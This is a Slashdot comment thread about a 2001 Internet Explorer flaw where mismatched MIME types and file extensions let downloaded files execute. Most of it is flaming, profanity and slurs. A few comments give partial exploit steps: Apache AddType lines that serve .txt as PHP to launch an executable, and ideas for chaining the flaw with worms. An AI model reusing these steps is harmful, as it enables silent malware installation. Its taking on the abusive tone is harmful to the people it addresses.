4.) Do you have even the slightest bit of journalist integrity?
I suspect that the answer to all the above questions is "No."
Michael, you're an idiot. You have an uncontrollable case of "diarrhea of the keyboard." Your ridiculous ranting drips with stinky, runny shit.
Tell me, monkeyboy, had you found out about this flaw in Konquerer or Galeon or Mozilla, would you have ranted on in the same manner? Of course not; those products aren't made by Microsoft, therefore they aren't "EVIL!!!!" If this flaw existed (or does exist) in any other non-MS browser, well, you'd just say that it was a minor bug that was going to be fixed "real soon now."
However, since the flaw reportedly exists in IE, it's obviously a horrible conspiracy by Bill Gates and his Microsoft cronies to destroy everything that is sacred! They pissed on Mom's apple pie! By God, they'll be killing puppies next! They must be stopped!
Looks like it's time to take advantage of Slashdot's filtering features again. I've already filtered out articles by Jon Katz, and anything to do with anime (I don't care for anime). Time to add monkeyboy Michael to the list.
Not surprising that Slashdot's filters work so much better than Slashdot's editors.
"The dead do not shoo-bop-aloo-bah." -- Kai, 'Lexx'
I don't know what agenda I'm trying to push. I work in a MS shop and my programming resume is very MS focused. I have a lot to lose if Linux catches on very far. I don't even have it installed on my home machine right now. I don't think you are stupid or that you're trying to tell fibbies.
What I'm saying is that Slashdot used to be nothing but nerds - the clear Linux focus meant that only a certain kind of people came around. Now it seems everyone comes around - and there's little focus. And as more of the general populous comes in, some of the old nerds (who said things that interested me) leave.
I think it's great that Slashdot is more balanced in its coverage of MS now. But its bad that I have to read through a lot more things I don't find interesting. Moderation has become very predictable - moderators waste their points on safe targets like obvious trolls and "long comments with lots of links that sound intelligent". Sometimes I think they're just trying to get by without being meta'ed down.
I'm not saying that non-Linux nerds are stupid. I'm just saying that the crowd that Slashdot used to attract said things that were more interesting to me.
Let's not stir that bag of worms...
No suprise that Micro-Soft was so very vocal about putting an end to Information Anarchy.
They must have seen this one coming....
In the course of every project, it will become necessary to shoot the scientists and begin production.
- However, to exploit the vulnerability, "attackers would probably need control of a Web server so that they could control the information sent in the HTTP header," Wysopal said. As a result, attacks could be traced to the malicious site.
Reading this one would think, "Oh, no problem. What webmaster would create a trackable exploit?" (ignore comp-u-geek for a moment).Add this exploit to wide-open server crack Code Red2/ Nimda...you've got a clear way for a third party to cause a *huge* disaster.
My logs are *STILL* full of Code Red 2 and Nimda attacks (running appache, so I don't care). How long until these OpenDoor servers are "patched" with the malformed MIME header exploit?
-- @rjamestaylor on Ello
No one should be publishing what the bug is and how it's employed. To state that Microsoft is obscuring the information is an uninformed comment brought on by juvenile hysterics and ad hominem Microsoft bashing. Get a clue, you moron.
You can demand anything you want, but have you considered that he is entitled to his own opinion?
If the low UIDs and zealots want to keep the blinders on
And what is wrong with zeal? Having a low UID indicates a person saw and recognized a good thing long before everyone else jumped on the bandwagon.
First let me say I am in no way a microsoft advocate. I run exclusively Free software at home, but the place I work is a microsoft shop.
Actually scripting is used a great deal in many companies. We use e-mail forms with alot of scripting behind them to make many things easier. For instance the helpdesk has a form that forces users to enter certain information before they can report trouble tickets. It's alot easier than dealing with an e-mail that simply states my screen looks funny. We have another that allows users to check the size of their mailboxes on the exchange server. We couldn't do any of this without scripting. These are just a couple of examples, but there are many uses for the features built into outlook. If people would actually try to learn more than a basic user's amount of knowledge before they come on here and bitch about how bad things are they wouldn't come across as being a bunch of idiots. But what can you expect from the average IT "professional"?
If you've never worked with scripting in outlook, buy a book, you may be impressed with what you can hack together with a form. If you have and don't like it, then disable it. It's not that hard.
If Microsoft doesn't patch their bugs for us, or remove/make optional features/bugs of their operating system for us, we'll write programs that do.
Hell, I don't start IE6 without a copy of Pop Up Stopper by Panicware, since I can't turn off pop up windows like I can in Mozilla. And the really bright ones among us don't use anything but litestep :)
So who wants to start a betting pool on how long it'll take Microsoft to start lawsuits against programs like these?
***JUMP PAD ACTIVATION INITIATION START***
***TRANSPORT WHEN READY***
... set content type to "audio" and fed executable instead with pif or vbs extention. Dumb IE rendering engine EXECUTED IT WITHOUT *ANY* PROMPT!
:)
Lucky me! Just a day before this virus hit our company, I switched to Opera for e-mails too.
...If you are at all surprised by this. No, Bill, you don't count.
Don't you get that feeling that some of these people are former TeamOS/2 ers?
Sure, the part about 'Microsoft doing what's best for Microsft' is a little bit of a personal tiff, but at least it's true. But dude, if you're going to claim that Microsoft isn't going to release a patch, at least link to a site that supports your claim. There's nothing like giving out false information, and then saying "Verify it with this guy", who says "What? He's full of shit."
Christ, How many Slashdot editors are there? And how many items are actually posted? At least read what you're posting. (And maybe spellcheck once in a while)
"I can't give you a brain, so I'll give you a diploma" - The Great Oz (blatently stolen sig)
??? Well, I haven't used the Mac for several years now, but this sound like eliminating one of the central strengths that the Mac had.
I suppose that Darwin implied changes, but I've always thought that the Mac resource fork (and file signatures: Application and file type specified separately) were a great source of strength and stability to the system. (Granted, they added a layer of complexity, required additional tools, etc.) I can think of several different, but logically equivalent, ways to merge that information into a ext2 file system (basically via the use of hidden files), so I don't see any reason that it should be a problem. After all, their UI sits well on top of the *nix underpinning, so their utilities could automatically open/copy/move/delete/etc. both files whenever the user used one. I guess that file signatures were the sticky part, but combined together they were only 64 bits (and letters at that), so it would be easy to just say the first line of the file was the signature (not elegant, but this is a shoe-horn job -- and that's basically what the #! line does, so the metaphor translates).
The Mac's weaknesses were (are):
1) It was one of the first GUI designs, so there are a lot of bumps, and places where it had to be patched. And it's relatively difficult for programmers.
2) It costs more than an equivalent PC.
3) It is sole sourced.
... That seems to be pretty much it.
Note that 1 and 3 are sources of strength as well as being weaknesses. But I think that over time they have become weaknesses.
The true strength of the Mac was that there was a good design behind the GUI, with careful attention given to all parts. Compare the use of command keys in the Apple GUI with the clumsy use of accelerator keys in Windows (I rarely bother) and Linux (well, I should learn to use them before I comment too harshly here, but I've been using Linux for 3 years now, and still don't use any of the accelerator keys).
.
I think we've pushed this "anyone can grow up to be president" thing too far.
"Don't you get that feeling that some of these people are former TeamOS/2 ers? "
You mean people like Nicholas Petreley and Joe Barr? No! Not possible!
Why the hell is Microsoft so dependant on file extensions anyways? How about looking at that nice glob of header at the begging of most file formats to determine what it is. Or, my favourite way is to let the user figure out what their files are. File extensions is an archaic way of determining what the file is. I should be able to have an avi file with a txt extension and still be able to play it in Windows Media Player (shiver, painful program, painful interface, oh woah is me).
Oh well, everyone needs to gripe about something. At least all of the unix systems don't rely on file extensions, I can have solace there.
--- I used to moderate, then I read the -1 articles and decided having to filter through them was not worth it.
From the article:
"Microsoft will patch a flaw in its Web browser...
Yes, that's correct.
From the article's intro:
"Microsoft has known about it since November 19; they refuse to provide any information about when a patch might be made available, if ever."
OK, I'm still waiting for you to make a point...
Hint: they still didn't say WHEN; Sure, they've said they WILL, but they didn't give any information about when the patch will be available.
Looks like the article intro is correct.
I like IE better than Netscape. IE tends to be a little bit faster than Netscape. Netscape tends to be unable to load many web pages that IE loads with ease. Netscape also freezes up all the time. I run both on my computer.IE may have huge security gaps, but I just don't really care.
If you don't understand any of my sayings, come to me in private and I shall take you in my German mouth.
[Scene: Historical tour of the Web, 2053]
[Commentator: "And here we have another example of an irrational, intellectually empty text contribution to the website known as 'Slashdot.org' It was commonly refered to as a 'pro-Microsoft rant', something that occured more and more frequently after the website became increasingly popular. It was said that the increased popularity attracted more Microsoft 'fanboys' and ultimately lead to its demise.]
[Audience. Sound of digital cameras taking pictures]
I ran into an interesting passport issue today.
When you create a hotmail account, it also creates a passport account as well. But, after that initial creation, the 2 accounts are not tied together.
Hotmail will disable any account that hasn't been accessed in 60 days, BUT, it does not disable the passport account at the same time. So, if I create an account with hotmail, and use it mainly as a passport for buying stuff on websites, and I dont check my hotmail account for a while, it gets disabled. The problem is, I can still use that login to access passport.
Now, the even bigger problem, is that someone else can go to hotmail, and create the same account that I did (because mine was disabled) and the new password they chose for the hotmail account will affect the passport account. So, in essense, I just got my passport account stolen from me.
And with stuff like this going on, they really want me to use passport. I really dont have a problem with entering my credit card info manually, if it is going to stop people from stealing stuff, or using the card without my knowledge.
Anyway, im sure we will see more of this in the future, I hope the best for the liberty alliance..
I was developing a web application that would serve out a chunk of opaque data for the user to save on their hard drive. So I set the Content-Type to "application/octet-stream" and the "filename" in the URL was foo.yai which is a totally bogus extension, right? Well it just so happened that the actual content of the data was XML. But not only that, it was XML saved as a UTF String so that it had this two-byte header on it which indicated how long the UTF String was.
.com is an executable as far as Windows is concerned. Brilliant.
Clicking on the link that generated this file worked fine on all browsers but IE, of course. You would click on it and all other browsers would properly show the user the "Save As..." dialog. IE looked at the file and determined that it was XML (even without and xml extension!) and not only that, it was so bold as to tell me that my XML was mis-formatted because of this 2-byte header at the beginning of the file! So it started its embedded syntax-highlighted XML viewer that it has and then stops and says "Misformated XML, unknown characters before the <xml> tag...". Gimme a break!
The "workaround" was to set the Content-type to X-Made-Up-Content-Type-To-Fool-Stupid-IE and it decided that this was something that should receive the "Save as..." dialog, as did the other browsers, thankfully.
So I'm not at all surprised that someone found this vulnerability with IE being so bold as to guess the content-type when it is set to application/octet-stream and start doing whatever it wants to based on its guess.
And have you ever noticed that IE get's the extension from the last thing in the URL _even_ if it's a query string? So if you have a URL like http://www.foo.bar/download?e=greg@yahoo.com
then the filename it will try to save is "download.com". And of course
The old IE executable *.gif has been known for years now.
Cnn is reporting Yet another Very Big and Annoying hole has been found at microsoft. To qoute the reporter, "THe Annoying Hole was found to be nothing other than Steve Balmers Big Mouth" Microsoft says they are in the process of working on a patch, but also commented "How do you stop verbal diarrihia?"
"All I can tell the "lesser of two evils" folks is that if they keep voting for evil, they'll keep getting evil."-Lp.org
Maybe sounds so stupid, but I use Gozilla or DAP for download my stuff in MISE. I just use MISE for those "only IE sites", other thing try netscape 4.79 because it opens more "IE sites". Anyway is better to *save* all files in disk and never let any program to execute them.
Read the original post closely:
.exe files are text/plain ... in which case you get the prompt, and then Windows opens the executible in Notepad.
.txt files are application/octet-stream ... in which case they are still displayed as text in your browser.
IE handles files in an odd mish-mash of looking at the Content-Type sometimes for some purposes, looking at file extension sometimes for some purposes. It's hardly surprising that the bug-hunter in the above story has found a way to feed it a Content-Type at odds with the file extension - the Content-Type may be innocuous, but the extension says "execute me", so when the "integrated" IE engine gets ahold of it, the malicious content is automatically executed.
Where is the exploit in this? Any user with half a brain (not many, I know) will see that this supposed text file ends with ".exe" or something. That's a trigger right there.
AFAICT, IE relies soley on the file extension when deciding whether or not to execute a file.
You can try and tell it that
You can try and tell it that
The only way I can think of making this work would be to change the MIME types on the client machine (i.e. Explorer > Tools > Folder Options > File Types). And I'm pretty damn sure that's not possible via plain-Jane HTML.
Tuus crepidae innexilis sunt.
All viruses are not worms.
All operating systems are not created equal.
All birds cannot fly.
Um... where was I?
I click that link. It says "you have chosen to download text.txt, would you like to open it or save it" etc.
So I choose "open it" and then it gives me another dialog: "you have chosen to download calc.exe, would you like to run it or save it"
So If this example doesn't exploit a vulnerability in IE, then "Opera is vulnerable too" is a non-sequitur. How can it be vulnerable if IE isn't vulnerable in the first place?
The following sentence is true. The preceding sentence was false.
While I was reading this article I found someone had sent a message to my hotmail account with the following in it:
.exe file.
Content-Type: audio/x-wav; name="New_Napster_Site.MP3.pif"
I opened it in notepad and it's an
Kind of makes a mockery of hotmail's claims to scan all email for viruses with mcafee...
graspee
petitiononline sends you an ad when you use their service.
-- dieman - Scott Dier
I don't understand the difference between file extensions and metadata. If you set your file to be application/exe (or whatever an executable format is) then how is that different from making it a .exe (in the windows world).
.txt or /text) can be executed, the problem will exist.
It seems to me that as long as data files (such as
Or maybe I just don't understand the problem...
Thought I'd inform you as well :)
IE 5.50.4522.1800 with SP1 and all the critical updates.
Just tries to open it in winzip.
The following sentence is true. The preceding sentence was false.
In the second, binary only scenario, the PITA of reverse engineering ensures that a much smaller # of both white and black hats will attach themselves to the problem, and J-Random-tinkerer can't contribute at all. You've made it less likely that some "bad" person will use the bug to hurt you, but you've also made it less likely that some "good" person will find it and help you avoid or minimize the damage from the "bad" person's discovery.
My point is, security is a gamble. You are always gambling that there are no bugs in your program that some bad person is going to discover and exploit to harm you. "Security through Obsurity" is the wishful thinking strategy; it seeks to minimize the # of people who find the bugs, and then hope that those people are only the "good guys." Open Source and full disclosure are the "hedge your bets" strategies. They seek to maximize the number of people who find the bug, hoping that at least *one* of them is one of the good guys.
Purely statistically speaking, which do you think is likely to be more successful?
Its too bad that news like this doesn't suprise me anymore. Further negligance by Microsoft isnt going to be attacked, but accepted. Now that is scarry. --theKiyote
Simply put a 'text' file on MSN which is actually the patch. Users don't even have to know they've been patched.
(Which makes me wonder, was this security hole left in to allow the installation of magic lantern and similar software...)
- You don't know how to maintain a station wagon either!
Little "x" ?! More like a giant red cross taking up half of the screen on XP.
this is too easy, I am not a programmer (unless html counts) but I do have an Apache/PHP setup and was able to test this out. get php to process .txt files in your php.conf file likle so:
.php .php4 .php3 .phtml .txt
.phps
AddType application/x-httpd-php
AddType application/x-httpd-php-source
then cread a whatever.txt file like so:
put the readme.txt file in your webroot, along with the exe file you want to execute.
user gets:you've chosen to download readme.txt..." and picks "open from current location"
instead calc.exe is executed as evidenced by the calculator opening on my workstation when I tested it.
dude this is way too easy. Someone who is a programmer could easily display a text document in addition to installing a rootkit/virus/trojan, and end user would be none the wiser.
good thing this information hasn't been released to the public.....doh!!!!
(disclaimer: yes, I did read the article). In general, MS seems to care not that much about IE/Outlook security (see reluctance to provide no-HTML patch to Outlook). But see today's other articles: MS cares quite a bit about digital rights management, and getting their finger in the pie for music and video. So: emphasize to gates & co that rogue software could get in through Outlook, execute on the client machine, and crack and make copies of video, and WMP files. Better yet, have some Russian guy write a virus that cracks all your DRM-covered files, places them in your share folder, signs you up to Morpheus (if you're not already); and finally sends itself to your address list. RIAA/MPAA: MS, you gotta stop this! Plug those browser holes NOW!
Trust me it's a lot easier to support clueless suers in Linux since they don't have access to destroy the machine anymore.
UI can be just as userfriendly. I had to do that after people kept taking out my windows install by accicent(at least once a month)
Last I checked, "possession of stolen property" was still a crime.
I'm talking about LAW. Not hyperbole. Not your fantasy. the LAW. No where, no where at all, in any law, is copyrighted material considered "stolen" The fact that you equivocate "copyright violation" with theft does not have any bearing on the LAW.
Last I checked...
If you're so good at 'checking' why don't you look it up and see for your own god damn self. Then come back and show us all where it says that possessing copyright infringed property is the same as possessing 'stolen' material.
autopr0n is like, down and stuff.
You can fix that in the display settings. Set "Windows and buttons" to "Windows classic style". You have tu turn off the green start button separately for some reason, I guess they were especially fond of that for some reason.
so he's gonna get fired from school?
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
I am not sure this is very practical for win9x/winXP home users, as they do not even know they are "logged in". Especially for 9x, since it isn't multiuser and doesn't enforce even the most basic security policy. XP home users don't have to put in a password to log on, and if I am correct, have administrative privileges.(feel free to correct me if I'm wrong here) Not sure what the best solution here is though, since MS users are less than security conscious anyhow and typically don't patch their computers. (How many systems have you seen that had virus defs that were 2 years old?)
Russian Russian Russian RussianDollSig DollSig DollSig DollSig
its illegal to exploit this to do anything bad, isnt it? anybody who tries, will be hunted down and punished -- but punished reaal bad -- with the help of the new anti-terror legislation. i am sure MS has a reason why it has been designed like this and probably it is a good reson. maybe they will even tell us some day what those good reasons are. maybe it is better for us not to know. a company that big with that many programmers working millions of manyears to improve their state-of-the-art products certainly doesnt let this happen by oversight. i therefore assure you: relax, all is well, there is no need to worry.
Interesting point.
Bush's education improvements were
You were very quick to be hostile. Sometimes I don't have control over the operating system used by my customers.
Bush's education improvements were
I posted the fix on another thread on this article.
--corky6921
What about the IE de-integration done by Win98 Lite? Does it stymie this vulnerability?
The way the article was worded, web sites and emails could just automatically start executing native code.
Because it's part of the Windows OS. When grandma goes out to buy herself a nice Dell computer, it comes with Windows preinstalled, and hence has IE installed by default. She would have to take extra steps to download and install a different browser. But why, when IE seems perfectly fine, and it's integrated so nicely into the desktop? And it's hard to argue that. Think of the average home user that isn't as aware of these issues as we are.
But don't you see? This security hole is the solution. The exploit can be used to install another browser. This bug should remain unpatched as part of the settlement in the Microsoft case.
Basically, the first 256 bytes of the file are scanned, and compared with the Content-Type header. If the two results do not agree, the scanned type is used. If the scanned type is ambiguous, and the file is binary, then the user is prompted to save or execute the file. If the file is text, it is displayed.
Now, can someone explain what is wrong with these instructions that would cause executable content to be automatically executed? The text even gives an example of a file extension of .DLL and .BAT, and how those would be handled.
If history repeats itself, I think this is how it will happen. Microsoft may release a bugfix in the next few months. However, they won't publicize it much, partially due to the fact that they don't even think it's a bug. Eventually, i'd say three months later, a virus creator stumbles along this bug, makes a virus like code red, and then it gets big media coverage, while everyone tries to patcht their systems.
This readme describes how the vulnerability works.
;)
No, really it will download and execute calc.exe from a Win98SE install. Of course, since it could be any program, including trojans or viruses you'd have to trust me. Doesn't that suck
http://donkeynuts.org/readme.txt
how big an idiot he really is.
glrotate
sure would be nice to have a squelch command for some users.
People should know IE will always be insecure....Thats why I went back to Nutscrape but i guess it only has a slightly smaller amount of security issues.
"I disapprove of what you say, but I will defend to the death your right to say it." - Voltaire
Well, with IE 5.5sp2(NT4.0), the vulnerability works exactly as described in the article.
What crackhead moderator labeled this as "informative"?!
It continues to amaze me that MS products are being used in shops more and more every day where security is even remotely an issue. Not to mention any federal government agencies. I'm nearly convinced that there is no hope and that most IT departments are led by brainwashed invalids who should be fired for incompetence. In fact any IT manager who continues to put out MS products on corporate desktops, knowing the track record in the "non-security area", should be brought up on criminal neglect charges. They should have to pay damages for every virus that enters their company through one of the many open doors in the MS software that are left wide open without concern.
I realized MCSEs are a dime-a-dozen but I have to think at least *some* of them have the capacity to be retrained and put to better use than chasing the rabbit around the dog track.
I've actually been hit with some virii spread in e-mail because of MS Exchange automatically viewing the file as HTML. The "re-typed" content type is often of the music variety ".wav" with an executable payload that does malicious things.
Thankfully I have the security screws tightened down as far as they go in MS Exchange and the virii have never done anything to my computer or spread beyond me. (At least to the best of my knowledge)
42 - So long and thanks for all the fish.
Novice users will take you literally. It happened to me.
My first month on the job, for an employer who made us peons use communal banks of PCs. Someone two seats away was running WordPerfect 5.1, and asked me "How do I save this file?"
I answered "Control Alt Delete," and before I could stop her, she'd rebooted her machine.
But of course, IE isn't software for productive work...
I can see the fnords!
...but sometimes I fantasize about someone writing a really really mean, evil microsoft virus from hell so people understand what's really at stake here. ...of billions of money!
I mean we're talking billions of billions of billions of billions...
get xited
Try this too:
If a page is called '.txt' and mime-type is text/plain, MSIE will *still* treat it as HTML, if it "looks like" HTML source.
See this for example, or if you want to be naughtier, try this for a crash.
Make even shorter URLs - 8LN.org
This keeps happening to me. I'm driving and a report on a new, horrible "computer virus" starts coming over the radio....or I see a scary article in the newspaper on how evil "hackers" can take over my computer just by sending me an email. Naturally, I am all ears (or eyes). Then, at the end of the piece, I am scratching my head. What was that about? Then it hits me - this is only about Windows machines, nothing to do with me. They didn't say so, because for these computer "journalists," "computer" means "computer running Windows." And further, although I know little about that particular operating system, I know that the so-called security hole just doesn't exist for users who have simply turned off the automatic execution of scripts, and who do not respond to invitations to run programs that they have not installed themselves by clicking "Sure!". I use Internet Explorer, at times, on my Macs, and I know there is a supposed similar "vulnerability," but I'm not worried, because I've set it, as well as any other browser I might use, to not post-process files. All of these hand-wringing articles give the impression that there is little the poor user can do, at least until some commercial virus protection software is updated. They never mention that he can either stop using Windows, or learn how to use it intelligently. My point? I thought the articles about computer-related subjects on Slashdot were supposed to be a bit more sophisticated than what you might find in a newspaper.
"Computer illiteracy is usually not about a lack of skill, but a fear that it is impossible to learn a computer skill. It is an acquired behavior."
Agreed, but it's damn hard to get people to unlearn that fear. And that's the problem.
I'm the stranger...posting to
I use Netscape 4.7 at home and Mozilla at work. But I have to have IE installed and configured on both boxes because there are sites which don't work in those browsers. Some of them just plain won't render the page, instead saying "Document: Done" while displaying a blank page. One of those sites was done in PHP ferchrissake.
Bite the hand.
Please...Wu-FTP is flawed all over the place. I think most of the distros have already given up on it because it's too slow to give out the patchs and there's too many buggy routines (which return root-exploit after root-exploit).
And you can't really blame "Linux" in general over a third-party application's buggy code. As for Windows, it is indeed Microsoft who controls and maintains the code. Not to say that the open-source community doesn't run into its own serious bugs, but in general, we tend to report them a lot faster than the MS crew.
Zodiac Survey
How do you think they got the name "Microsoft?"
Oh when Mozilla & Opera had security holes in previous builds, SlashFuckheads didnt report it nor they didnt report any security holes within CDE/Solaris platform when I posted the news. These slashfukkers are biased cunts and fuck you guys all to hell. Try and be open minded and not attack Microsoft All The TIME!!!!! You think that Bill Gates-Borg icon is funny, its getting tiresome and grow up!! If you want to generalize and be pig headed, I notice all the Linux students at my University look like Cowboy Neal -- TOTAL FAT FUCKERS with no life!! Why not use Cowboy Neal with that fuckin Tux Hat as an icon for Linux News you bitches!!!! http://www.cowboyneal.org/ Check out the LOSER!
No, it doesn't. I just printed something from opera, default settings, and it came out fine. I'm using version 6 on win2k.
Microsoft may not have won the browser market fairly, but that doesnt take away from IE's strength.
Yes, it does. Certainly in my opinion at least.
You cannot claim victory when the referees have thrown down the penalty flags against you.
And IE has NO "strength" whatsoever on the Linux platform since it does not run there. In order to even be eligible for the distinction "WWW's Greatest Browser(tm)" you simply _have_ to be cross-platform. Cross-platform functionality is the foundation of the Internet.
IE violates this. It is therefore NOT the Web's Greatest Browser no matter how many people buy computers with it preinstalled.
Exceeding the recommended torque is not recommended.
I just hope that anybody doesn't remember to
create an hybrid virus that spreads using both
IE browsers and IIS servers, exploiting this
fail and the ones from code-red/nimba/etc.
Just imagine a code-red like virus that posts
web pages in hundreds of unpatched websites containing another virus that would attack IE browsers, that would spread again to IIS servers that would spread...
Couldn't a webcrawler be taught to search for this exploit in the wild?
[news for me, stuff that doesn't matter]
Just curious why you would choose to write a temporary local file when you could just use "print $content" where it says "fopen... fpassthru..."?
-- thinkyhead software and media
Winamp is probably one of the most commonly used pieces of Windows software available. And might I point out, that it adds a mime type (or something) to windows' system that tells windows to automatically open the document when finished.
I tested it myself, I have Xitami on my Windoze machine, and renamed a binary to test.wsz. It downloaded and opened automatically (so fast I couldn't have canceled had I wanted to; but that's cause i was downloading from my own machine, but it's very possible to make it run by fast even on a remote server, especially if you target a broadband user.) Now since it opened to Winamp it obviously wasn't executed (just seemed to cause winamp to refresh its display.)
But I wonder, could there be a way to combined these two? Then the victims wouldn't have to do anything except load your page. Everything else could be made to happen so quickly they may not even notice!
Also when downloading a WSZ file, you aren't even prompted to do any of the following:
Whether or not to open
Where to save it
What it should be named
Or to close the download dialog automatically
Obviously a person could write a very small binary and download it to a persons's computer in seconds. It still has to be determined if a binary can be executed this way though
These two ISPs have those gay interfaces that load up content using MSIE automatically. Almost everyone who uses those services just browses within the AOL / CS2K window, which is just a wrapper for MSIE, AIM, their email client, etc.
Those users are pretty much fucked. I suppose if you're a hacker you know who to target now.
With text/plain it simply treated it like a normal .exe file. (asked if I wanted to save/open whatever)
autopr0n is like, down and stuff.
Opera 5.12 is also vulnerable. Check the following link: http://www.securityfocus.com/archive/1/244953 If you already have 6.0, then you should be safe, but apparently, the same is true of IE 6.0, which has been quite thoroughly tested and does show the appropriate .exe on the second dialog.
Sorry if this information is redundant, but obviously, someone did not see it. Apparently, this security vulnerability has been known by the IE and Opera gang for a while, or why do you think that the 6.0 versions would have already solved the problems?
QuadGoatBoy
"I have lost many friends to the squirrels..."
No one paid for netscape.
autopr0n is like, down and stuff.
Perfect timing! I was just wondering how to "write" an Excel file & send it to a browser.
The actual content-type flag is "application/vnd.ms-excel"
Thanks!
Eel
This sensationalized story is nothing more than Microsoft-bashing.
Exceeding the recommended torque is not recommended.
That wasn't a joke. :-)
Slashdot? Oh, I just read it for the articles.
Really, READ the EULA, any EULA.
As things stand now it's totally one-sided:
You have the right to PAY for "the software". That's all. Don't expect it to run. You're responsible for installing it correctly and making it work for you, but you're not allowed to reverse engineer the program and fix it if it doesn't work right. You also have the right to pay for the lawyers if the developer decides to come after you for any reason, no matter what the outcome of the action. The developer has the right to snoop around your system to make sure you have a legitimate license and disable any of his software which he thinks you haven't legally obtained. If this shuts down your business and you lose $100,000/diem for the 2 days it takes you to cut a deal with his salesman and the 3 days it takes to reinstall his software, too bad. If you can come up with the receipts to PROVE you've paid, you still have no legal recourse against the developer. If you badmouth the developer because he shut down your paid-for software until you exercised your right to PAY a second time, or because his crapware is a piece of shit, you're in violation of the EULA, and you're paying for the lawyers he'll send after you!
</RANT>
If the goalies & the pitchers got to make up ALL the rules, no one would ever score!
We need some middle ground.
Maybe if the developers were responsible for treble the retail price of their software. A little guy wouldn't be burned at the stake if somebody's business went down the drain, FREE software would be left out because it's retail price is $0, but the Empire might take a hit in the class-action suits that vulnerabilities of the magnitude being discussed here would cause.
Imagine the Empire being made to refund $550/copy for a million copies of software that were found vulnerable to a virus that deleted all data from the customers' disks. That might put a crimp in their monopoly. It would _certainly_ give FREE software a chance on the desktop!
Exceeding the recommended torque is not recommended.
To: Chris Wysopal
Re: Recent comment to newsbytes and other news services.
http://www.newsbytes.com/news/01/172878.html
In a statement attributed to you on newsbytes, they claim you said that malicious hackers would need control of an httpd server to use this exploit. This is very untrue. Using this exploit is far simpler than that.
All a malicious hacker would need is a normal web account with any ISP. Normal web accounts generally allow cgi-bin access for that account. A simple cgi script could utilize this exploit, as all cgi scripts that communicate with tbe browser, by design, should send headers. This isnt usually *necessary* as most web servers generally will create the header as needed (assuming it understands the content generated by the cgi script), but is how cgi works.
If, for example, you have ever been to a site where an image is being displayed as plain text, or a download of an exe file or zip file or other understood format is garbled, *when those files are sent via script*, it is often because the script creator forgot to send a header before the data and the web server treats and sends the file as plain text.
Thus, to use this exploit, anyone with a real, full web account with any decent ISP would simply need some scripting knowledge (being a "malicious hacker" sort of implies that), and knowledge of the appropriate header to send.
Our best,
Robert
cc: SlashDot
NewsBytes/Brian McWilliams
WebMaster:
BinFeeds
XXX Thumbnailed Image Newsgroups but
I want someone to post the link where if I browse to the link http://www.xxx.xxx/blah.htm I get a new file created on my disk. I challange anyone to create such a link to exploit this security hole that would create the file slashdot.txt in C:/tmp (OK you don't have to create the directory too). I leave this as an exercise for the student. IF someone is bright enough to create this link, I would be happy to go there and verify that this is a bug. In the meantime, I'm using Opera. This would do more to support the bug weakness than any of these posts.
Ross Youngblood
Oh, OK, sure, flame me into karma hell
but isn't this a patch?
--
greenpeace++
For those who aren't aware, MS does have a fix available for this problem. Their remark about not considering it a problem apparently applied to an earlier, less severe, version of the problem, which didn't allow random programs to be run without notice.
n /MS01-058.asp
The fix, which was posted on December 13 (yes, almost a week ago, and before this article was posted), is located at http://www.microsoft.com/technet/security/bulleti
One had IE 5.5 SP2 and one IE6. When I tried to run the 5.5 SP2 patch on the IE 5.5 SP2 computer I got a message which said: "This patch will only work with the SP2 version of Internet Explorer 5.5". DOH!!! The IE 6 patch installed on the IE 6 computer, but now Internet Explorer crashes continually! And..you can't uninstall these patches either. So...apply these patches with caution. Looks like Microsoft has DONE IT AGAIN!!!
It's so hard to find good flaimbait in the form of a story these days... oh wait. not on slashdot. The "story", if you want to call it one, is riddled with assumptions. I'm tired of people attacking Microsoft as if it were just some entity that they didn't like. Bill Gates is not an evil monster and Microsoft is not the evil empire everyone here for some reason wants them to be. These are people who have ideas about how things should be. Good for them for bucking the system!
SL33ZE - Artificial Intelligence is No Match For Natural Stupidity -
No troubles with that un!